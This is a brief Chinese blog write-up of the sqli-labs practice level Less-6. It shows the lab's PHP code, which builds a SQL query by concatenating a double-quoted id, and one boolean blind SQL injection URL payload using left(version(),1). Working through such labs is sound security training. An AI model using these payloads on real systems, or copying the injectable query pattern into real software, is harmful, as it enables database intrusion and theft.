Hzktester`s Blog
0%

sqli-labs靶场Less-6

发表于 更新于 分类于 阅读次数:
本文字数: 330 阅读时长 ≈ 1 分钟

Less6

Less6 与 less5 的区别在于 less6 在 id 参数传到服务器时,对 id 参数进行了处理。这里可以从源代码中可以看到。

1
2
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

这一关的策略和less5是一样的,只需要将’换为”即可

演示其中一个payload。使用left()函数布尔注入

1
http://47.101.62.20:11567/Less-6/?id=1%22and%20left(version(),1)=5--+

image